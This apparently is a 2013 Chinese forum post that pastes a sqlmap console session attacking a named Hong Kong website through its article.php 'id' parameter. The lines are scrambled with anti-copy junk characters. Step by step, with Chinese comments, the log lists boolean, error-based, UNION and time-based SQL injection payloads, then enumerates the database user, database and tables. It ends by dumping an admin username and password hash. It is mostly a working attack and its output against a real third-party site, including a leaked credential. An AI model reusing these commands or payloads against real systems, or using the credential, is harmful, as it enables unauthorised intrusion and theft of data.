D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db. a d, M' R$ `+ q# m1 ~
ms "Mysql" --current-user /* 注解:获取当前用户名称# K, K7 N/ \- S4 M; k7 X# A$ R# `0 M
sqlmap/0.9 - automatic SQL injection and database takeover tool7 o3 V8 v' t. C: T/ _* i
http://sqlmap.sourceforge.net starting at: 16:53:54
; |5 _! w5 X1 {: E[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as( _* o& C" K7 e
session file
1 z9 k; }' Z8 \[16:53:54] [INFO] resuming injection data from session file
! r6 @4 W) l; y[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file" T. z4 p' ]( B& i+ U$ N
[16:53:54] [INFO] testing connection to the target url0 E( r" {' N* L i0 {
sqlmap identified the following injection points with a total of 0 HTTP(s) reque" X" H6 y1 x7 ]& s8 H$ _% D1 e
sts:
& t4 t. d$ w1 F0 Y p---: K I* ^' } O
Place: GET
) p$ j, T" l3 Z' Y' f) `" G) z. ~Parameter: id' K( e* o q6 q" p
Type: boolean-based blind
0 N' H2 C$ {# E) C Title: AND boolean-based blind - WHERE or HAVING clause4 V+ l8 |5 S% m. ]8 H0 a- O
Payload: id=276 AND 799=7997 p& X) M( ?% a7 x
Type: error-based7 a4 L3 t3 I) O7 i
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
$ ~3 B+ E% L( J! r0 ?. [ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 {) b4 s. c! A7 X! E
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
M/ d0 @9 G4 {# R* |; U+ ~),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ K/ P% C! d: u$ H% q8 c" P2 j
Type: UNION query; v$ `; e% i& N9 [; U$ ~. b
Title: MySQL UNION query (NULL) - 1 to 10 columns' o4 K! q; C0 p
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 ~' W9 k: `- i2 A(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ e- e. R/ R0 r# U0 {
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
3 `" o0 b, m- n) C Type: AND/OR time-based blind
7 F) i. }# C z1 _1 X Title: MySQL > 5.0.11 AND time-based blind4 |; o& ^4 {- }. i6 u2 r. u6 E* N
Payload: id=276 AND SLEEP(5)! v4 @( ]2 g& [4 j9 C% L/ x) v3 X
---
Y) e" B* K! ?8 F3 U. n. t! C[16:53:55] [INFO] the back-end DBMS is MySQL
+ j# D) R: m. J2 uweb server operating system: Windows& s9 _* m0 u8 k
web application technology: Apache 2.2.11, PHP 5.3.0
3 r1 V6 [5 O$ G. {3 s8 x3 ?( yback-end DBMS: MySQL 5.0
$ I: T4 c" [5 e. n- Q+ a0 F[16:53:55] [INFO] fetching current user3 j# E$ R7 M/ a3 V3 p* ^; b T
current user: 'root@localhost'
! @6 B4 P, a7 D: ~. a+ u. w9 F5 W[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
' a/ f8 w- |# Z8 s- c. `tput\www.wepost.com.hk' shutting down at: 16:53:589 W8 b' h, U6 n9 t' w4 g) w* g& U$ ?8 I
; V% t2 H6 N) L2 d W
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
]0 w/ O/ q: a- f% i3 Cms "Mysql" --current-db /*当前数据库
! ?' p% f; U( M! c/ `$ j# \: B sqlmap/0.9 - automatic SQL injection and database takeover tool
0 X9 M8 ~( m- [6 K3 { http://sqlmap.sourceforge.net starting at: 16:54:160 p0 R' M; t5 I+ i9 h
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as1 |% W2 }) \) A& v
session file8 D3 W" s5 S2 e; j/ F
[16:54:16] [INFO] resuming injection data from session file
! ]. {1 F; T# U; t- f \5 K3 X7 U& l[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
% ^' y) t ~! g7 B1 L$ t[16:54:16] [INFO] testing connection to the target url' Y: V6 {9 X. Z* T6 J% u
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
' Y# ?6 t# S! a; Ests:
0 i9 e. R* ?$ ^0 E1 K# i---
& R& U' f d9 L& [) f4 @% \Place: GET0 s, f2 N* I' [$ R% V
Parameter: id
$ R. E; Q2 e- w' T( L Type: boolean-based blind
/ [$ s4 v$ n. l+ w H4 w! H Title: AND boolean-based blind - WHERE or HAVING clause% z& n+ ]4 f! f/ a% Z# w5 w) b
Payload: id=276 AND 799=799' p" w& O+ F" o$ I% S. ^
Type: error-based
3 Z8 d3 b9 `6 ^4 c, u Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% ?3 _2 d" F+ ^0 r Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 N2 P* X) n- P y5 a3 h- \
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
& x( j/ m* M* e6 k),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
( M2 Z& S3 c; q3 }& b1 X: t( C/ { Type: UNION query
' V& T( C/ F$ I Title: MySQL UNION query (NULL) - 1 to 10 columns
7 n4 z; c1 p% I, A {+ V Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" G& D* [" \8 C$ h' g
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),9 M5 z& R% Z$ v+ e. c2 o
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: X0 r3 [$ C- b/ _1 i, @0 l
Type: AND/OR time-based blind
$ [# N3 H" ^2 _ `/ d) [ Title: MySQL > 5.0.11 AND time-based blind
% _) f* V% d& j# Y I& ~: x8 W Payload: id=276 AND SLEEP(5)9 }% |, r! h& z- |
---
& G2 `# Y1 i* T# C/ i( C- }[16:54:17] [INFO] the back-end DBMS is MySQL
- f6 w2 q0 X- l# J8 }web server operating system: Windows
/ U) K+ L3 L F% J8 A) g. A# fweb application technology: Apache 2.2.11, PHP 5.3.0
9 Z6 Q+ K7 z& o7 ~; r! F' ?1 rback-end DBMS: MySQL 5.02 y5 V6 b- l4 r4 {) M7 |& i' D
[16:54:17] [INFO] fetching current database
; _2 K3 L: W' g4 f* ]- O/ Kcurrent database: 'wepost'8 \ W& U6 c) A8 D C$ }8 W
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# p, l8 w* V7 N+ H1 _
tput\www.wepost.com.hk' shutting down at: 16:54:189 i Z$ W. k7 l( a9 o+ ?
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db+ O+ i2 P7 O4 o) B; K, y+ o0 h
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名" Z; t9 s5 @: T+ R% U& K" E
sqlmap/0.9 - automatic SQL injection and database takeover tool1 E) h. R( |2 ?2 K- d
http://sqlmap.sourceforge.net starting at: 16:55:25
3 S$ x2 G& T) A/ R# ^/ Z% b) r! S9 ^[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
4 d6 B6 X" |9 x# d2 g7 f session file
& _5 U/ {2 x! f[16:55:25] [INFO] resuming injection data from session file& |1 J* G. b* Y7 k$ }8 d. d7 u2 b! j
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
2 @8 n9 ?* J4 n, H2 L! f[16:55:25] [INFO] testing connection to the target url
+ h! A/ f1 i; z- J1 z/ tsqlmap identified the following injection points with a total of 0 HTTP(s) reque
3 Y G: |2 A+ J6 asts:5 o7 A7 ]2 ^3 w- c8 q9 |2 d
---3 }' ^0 B7 N0 ?" ]2 s! _
Place: GET& Z I3 `2 X( H6 i8 n
Parameter: id! T, ]+ F8 S& j0 f5 L- B8 R1 Y% t# i
Type: boolean-based blind3 M/ y# ]) v* X* a' o7 X, g
Title: AND boolean-based blind - WHERE or HAVING clause
! K9 ^& L* Z6 `7 f Payload: id=276 AND 799=799
; B, ]( m9 l9 i8 i# Q3 X" _- z Type: error-based. h; r1 G9 s: p; v8 D
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
; I8 J, k5 y# } Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 d, g1 [ w+ K; c T1 Y& E W
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
& D% C2 ?; T- G9 [- B),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 C" f! K/ ^2 s, Y" h) X0 d a3 M
Type: UNION query
5 A& o. P! w# [" F: e o Title: MySQL UNION query (NULL) - 1 to 10 columns" T2 f5 S! H5 _$ ~ g0 W# E
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) R6 }7 d3 {* m(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; O5 z3 [; C" A4 i/ x/ y- r, t0 }CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 Q7 Z6 `& T5 B9 K# R4 Q8 }/ U Type: AND/OR time-based blind
7 `( g2 a Z' V Title: MySQL > 5.0.11 AND time-based blind
6 {0 i0 N, }6 Y4 E* F9 s* F Payload: id=276 AND SLEEP(5)
+ I2 ?) }; N* N. t4 |! y$ D9 E* E---
- M6 \$ Y# N% }/ e, x5 G) W( d- {0 C[16:55:26] [INFO] the back-end DBMS is MySQL. C+ q. M) ?/ A6 O; `+ X
web server operating system: Windows
9 w( F7 ~2 p/ R" Y# Vweb application technology: Apache 2.2.11, PHP 5.3.0
; d g; s. z6 T/ x- J6 T. Y( ^+ [back-end DBMS: MySQL 5.0( b6 }/ G: t; m. v3 }' t7 j$ w
[16:55:26] [INFO] fetching tables for database 'wepost'6 `0 C: t" ^- X. }: A
[16:55:27] [INFO] the SQL query used returns 6 entries0 G. {: Z+ G* J* N2 C: \
Database: wepost
7 K% A0 C# N0 b; o) a3 N[6 tables]- J0 \9 q! J8 e( f/ V* B( g1 y
+-------------+2 ~) H. {3 B! r9 m$ d' X/ ~8 j
| admin |
: H. b( ~" T& j% O" L/ ~3 p| article | q) w7 M0 r/ {, R
| contributor |0 d/ {9 T5 y5 Z3 v: {. u! {
| idea |" V( x5 }2 ]! C+ `6 i( f
| image |
0 [1 e5 X- Y( ~) P" p* e| issue |7 B8 y6 t% @1 u6 |' @0 a8 |
+-------------+
& Q/ [) ~. u5 v' V; w& n- Z[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# ]4 z- x) `( H5 ]4 K: Z
tput\www.wepost.com.hk' shutting down at: 16:55:33' ~7 I+ S* x- x0 t
\% J, b3 O3 o& o/ x+ U9 k/ ND:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) U: g& U" s! r9 u8 V8 X) kms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
9 e* [% e# z h9 _, m sqlmap/0.9 - automatic SQL injection and database takeover tool0 {& T0 }7 o: K" r3 u+ w
http://sqlmap.sourceforge.net starting at: 16:56:06
3 j2 M" f$ a8 r8 @! e5 u# Asqlmap identified the following injection points with a total of 0 HTTP(s) reque
! P+ W6 o( d1 b$ x6 n3 @. ssts:( f1 k1 t5 ^( L5 q; V( Q c1 x) H
---
3 w' f* m& s8 @; ~) p8 [/ x- ~7 PPlace: GET
3 D5 A2 H. K4 t" ^7 EParameter: id
$ d! w, {; a& I% Z+ h. V Type: boolean-based blind! U) i9 U) E$ W
Title: AND boolean-based blind - WHERE or HAVING clause8 }6 B4 {/ c( R7 A& p& C
Payload: id=276 AND 799=799
1 p8 P: {) T6 U Type: error-based2 @" M. @2 g; Z6 r; E* e. Z0 i
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 S T3 ^" Z- v; } Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
7 C6 [5 \6 K( b" x' B120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58& F S) Z' @: ^$ Z$ \
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 N L+ g- H* w( R: [( ~5 C
Type: UNION query
$ C' d7 f" T2 n+ i3 v Title: MySQL UNION query (NULL) - 1 to 10 columns4 c( c7 k/ O2 \
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: f( T: ?* q" ^( `- Y m
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 v: t2 E3 T5 i* U$ b S7 b
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 @* `2 f1 y3 D1 Z4 e: i) {% n Type: AND/OR time-based blind2 W0 v" E( P$ [% F
Title: MySQL > 5.0.11 AND time-based blind
2 q' f3 T- X( ]. R7 ~ Payload: id=276 AND SLEEP(5)
+ ?- W/ ?: l1 k, I6 j! h---: D4 ^+ G$ O3 s7 C$ H7 B4 ]. k
web server operating system: Windows
& w1 A8 @* U6 I3 x! \1 fweb application technology: Apache 2.2.11, PHP 5.3.0
Z% v! S2 S% R- g% @back-end DBMS: MySQL 5.0
+ Z) U _9 \9 M6 g* R8 F[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se R0 S/ A9 d/ X8 S4 l3 y- z" u* V
ssion': wepost, wepost1 J) U' ]8 H8 W8 y6 T/ A' Y
Database: wepost+ b" @; m/ r) c' Y2 d
Table: admin1 y2 C% | i. `9 I! i5 z
[4 columns]6 c W/ @/ i# K0 Q! m4 @
+----------+-------------+. ?2 e1 _5 {' w( x# I& \1 U( x
| Column | Type |
% T; G/ T C8 D9 _ _+----------+-------------+, Q& F" L. @9 G5 Q
| id | int(11) |
* i2 V/ k' {" T3 y| password | varchar(32) |) }. n5 t7 c7 K. c2 `
| type | varchar(10) |
3 y/ n$ U# s w5 p, v9 u' Z| userid | varchar(20) |
( E9 E! C$ l7 x3 r; S, a" _+----------+-------------+
3 s3 W" r) @* W2 z9 Q shutting down at: 16:56:19
4 }- u, L. `/ [5 \$ r8 _& w1 q5 a9 q v& r* V, T6 I7 i
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 g @5 i! f d# M* @& K3 j" z
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
: r" k: {$ s. {4 V9 I sqlmap/0.9 - automatic SQL injection and database takeover tool
& i8 A: _$ H7 t) K4 v* G, L http://sqlmap.sourceforge.net starting at: 16:57:14
9 O* K% U$ G& ^sqlmap identified the following injection points with a total of 0 HTTP(s) reque% s, x; }# u1 G5 S6 r% C: K
sts:
0 _$ _4 p4 b) f; F; {2 w$ B2 E---# q3 q- j1 }1 J3 N
Place: GET1 J5 |6 ` S6 v" `
Parameter: id2 {. d/ {$ B9 ~% @ l/ n
Type: boolean-based blind! z2 Y" i: p# @) |" Q+ @2 R2 z A
Title: AND boolean-based blind - WHERE or HAVING clause
7 J2 @# V: U" P: x7 E Payload: id=276 AND 799=799
4 j" n6 ~( M9 E' B% X1 M5 } Type: error-based( M" k+ Z: y" a8 ?
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; ` I4 t8 [) t& a* {' V& d4 j% _
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 A7 d& @! T$ X* A; e120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- k( Z5 D, ^# i; N- [( L& n),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 T {0 v, F) D+ p! q
Type: UNION query
) u" `) ]& ~. k Title: MySQL UNION query (NULL) - 1 to 10 columns
5 h ?. E+ U! w, P: C$ Z, _ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ R% ~. _2 g0 \: r(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) j( _. U* ~& k0 e& j8 ~5 ^& C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
0 a; ~& } T+ W6 n Type: AND/OR time-based blind2 f4 [' n% I, E/ r
Title: MySQL > 5.0.11 AND time-based blind
j! J' ~1 x4 q) G' d Payload: id=276 AND SLEEP(5)
: j2 {) e3 I- A$ G% M( _% V---9 ~1 T- m5 I; M
web server operating system: Windows
. O/ S+ v5 v+ P5 q# sweb application technology: Apache 2.2.11, PHP 5.3.0
" ^0 C9 C& |' K, q: F$ }back-end DBMS: MySQL 5.0
4 o% v' X! }$ E5 S' d) ~$ Crecognized possible password hash values. do you want to use dictionary attack o, S9 C8 z7 O' U9 _+ k
n retrieved table items? [Y/n/q] y6 ]: f* D9 Y H1 I4 R" E; p' r! D
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
0 Y/ z7 x) T/ T( D$ a+ [do you want to use common password suffixes? (slow!) [y/N] y0 o1 \8 W- K$ w
Database: wepost
/ e" H! U6 Q- B/ X2 G$ wTable: admin! V7 x5 k$ l) y" t
[1 entry]
/ o8 X0 \" w4 I/ }+----------------------------------+------------+; c3 P1 H) q K& }
| password | userid |* F+ F0 q4 O& a) a; ^/ `
+----------------------------------+------------+
8 O7 `5 I1 d0 v# O| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
' }# C$ [9 T5 E }' C9 |+----------------------------------+------------+
4 h, P+ m5 e+ p shutting down at: 16:58:14$ v2 S! r( P' P6 M5 D! H {: u
5 Y. s: ?* u" H/ A9 Z0 h$ X
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
分享
支持
反对